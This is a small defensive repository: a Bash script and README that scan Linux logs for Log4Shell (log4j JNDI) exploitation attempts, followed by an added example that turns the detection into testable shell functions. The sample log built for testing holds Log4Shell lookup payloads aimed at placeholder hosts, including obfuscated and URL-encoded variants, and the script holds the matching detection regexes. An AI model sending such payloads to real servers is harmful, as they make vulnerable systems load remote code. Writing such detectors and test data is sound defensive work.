├── LICENSE
├── README.md
└── log4j_ioc_detector.sh

/LICENSE:
--------------------------------------------------------------------------------
BSD 3-Clause License

Copyright (c) 2021, Omar Santos
All rights reserved.

Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:

1. Redistributions of source code must retain the above copyright notice, this
   list of conditions and the following disclaimer.

2. Redistributions in binary form must reproduce the above copyright notice,
   this list of conditions and the following disclaimer in the documentation
   and/or other materials provided with the distribution.

3. Neither the name of the copyright holder nor the names of its
   contributors may be used to endorse or promote products derived from
   this software without specific prior written permission.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# log4j Linux IoC Detector
A basic Bash script to detect log4j Indicators of Compromise (IoC) in Linux.

## How to Use
1. Clone this repository:
```
git clone https://github.com/santosomar/log4j-ioc-detector
```
2. Run the `log4j_ioc_detector.sh` script with root privileges (the script reads `/var/log`), as demonstrated below:

```
# sudo bash log4j_ioc_detector.sh
A basic Bash script to detect log4j Indicator of Compromise (IoC) in Linux.
Author: Omar Santos (@santosomar)
+------------------------------------------+
Scan Started:
| Tue Dec 14 17:26:36 UTC 2021             |
Searching for exploitation attempts in uncompressed files in folder /var/log and all sub folders
Searching for exploitation attempts in compressed files in folder /var/log and all sub folders
Searching for obfuscated variants
```

Any IoCs found in the logs are reported to the screen, prefixed with the name of the log file they were found in.
--------------------------------------------------------------------------------
/log4j_ioc_detector.sh:
--------------------------------------------------------------------------------
```bash
#!/bin/bash
############################################################
# A basic Bash script to detect log4j Indicator of Compromise (IoC) in Linux.
# Author: Omar Santos (@santosomar)
# Version: 0.0.1
############################################################

# JNDI lookup as it appears in logs: "${jndi:" (or the URL-encoded "%7B" form
# of "{") followed by one of the protocol schemes log4j can resolve.
JNDI_PATTERN='\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/.+'
# The same lookup without the leading "${", matched after de-obfuscation below.
JNDI_BARE='jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):'

Banner()
{
  echo "A basic Bash script to detect log4j Indicator of Compromise (IoC) in Linux."
  echo "Author: Omar Santos (@santosomar)"
  echo "+------------------------------------------+"
  echo "Scan Started:"
  printf "| %-40s |\n" "$(date)"
}

Banner
sleep 2

echo "Searching for exploitation attempts in uncompressed files in folder /var/log and all sub folders"
sudo grep -E -I -i -r "$JNDI_PATTERN" /var/log

echo "Searching for exploitation attempts in compressed files in folder /var/log and all sub folders"
sudo find /var/log -name '*.gz' -print0 | xargs -0 sudo zgrep -E -i -H "$JNDI_PATTERN"

echo "Searching for obfuscated variants"
# Remove "${lower:" wrappers and closing braces so a split-up lookup such as
# "${${lower:j}ndi:" collapses back to "jndi:" before matching. The pattern and
# the file name are passed to sh as arguments ($1 and $2) instead of being
# pasted into the command string, so unusual file names cannot alter the
# command. find runs under sudo, so the commands it executes already have
# root access to the log files.
sudo find /var/log/ -type f ! -name '*.gz' -exec sh -c \
  'sed -e "s/\${lower://g" "$2" | tr -d "}" | grep -E -I -i -H --label="$2" "$1"' \
  sh "$JNDI_BARE" {} \;
sudo find /var/log/ -name '*.gz' -type f -exec sh -c \
  'zcat "$2" | sed -e "s/\${lower://g" | tr -d "}" | grep -E -i -H --label="$2" "$1"' \
  sh "$JNDI_BARE" {} \;
```
--------------------------------------------------------------------------------
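Added example, not code from the santosomar/log4j-ioc-detector repository: the script's grep-based detection and the `${lower:` / `%7B` de-obfuscation it performs, restructured into shell functions that scan one file at a time and can be checked against a constructed sample log. It generalises the wrapper removal to `${upper:` as well; the function names, the `example.invalid` host names and the log lines are assumptions constructed for this example.

```shell
#!/bin/sh
# Added example, not code from the log4j-ioc-detector repository: the script's
# detection logic as functions so one file can be scanned and the result
# checked. The sample log lines below are constructed, not real traffic.

# Scheme list used by the repository script (raw, unobfuscated form).
JNDI_RE='jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):'

# normalize_line: undo the obfuscation the script handles (${lower:x} wrappers,
# closing braces) plus the %7B URL encoding of "{", so JNDI_RE can match.
normalize_line() {
    printf '%s\n' "$1" \
        | sed -e 's/%7[Bb]/{/g' -e 's/\${lower://g' -e 's/\${upper://g' \
        | tr -d '}'
}

# scan_file: print "file:line" for every suspicious line in the file given as
# $1; exit status 0 when at least one line matched.
scan_file() {
    hits=0
    while IFS= read -r line || [ -n "$line" ]; do
        if normalize_line "$line" | grep -E -i -q "$JNDI_RE"; then
            printf '%s:%s\n' "$1" "$line"
            hits=$((hits + 1))
        fi
    done < "$1"
    [ "$hits" -gt 0 ]
}

# count_hits: number of suspicious lines in the file given as $1.
count_hits() { scan_file "$1" | grep -c .; }

# make_sample_log: write a constructed access log to $1: one plain lookup, one
# ${lower:} obfuscated lookup, one URL-encoded lookup, two benign requests.
make_sample_log() {
    cat > "$1" <<'EOF'
10.0.0.5 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"
10.0.0.9 - - "GET /?x=${jndi:ldap://example.invalid/a} HTTP/1.1" 400 "-"
10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:rmi://example.invalid/b}"
10.0.0.9 - - "GET /?x=%24%7Bjndi:dns://example.invalid/c%7D HTTP/1.1" 400 "-"
10.0.0.7 - - "GET /static/app.js HTTP/1.1" 200 "curl/7.79"
EOF
}

# Stand-alone run: scan the constructed log, then clean up.
SAMPLE=$(mktemp)
make_sample_log "$SAMPLE"
scan_file "$SAMPLE"
rm -f "$SAMPLE"
```

Run against the sample, `scan_file` reports the three lookup attempts and none of the benign requests; to scan a real directory, loop `scan_file` over the files in `/var/log` with root privileges as the repository script does.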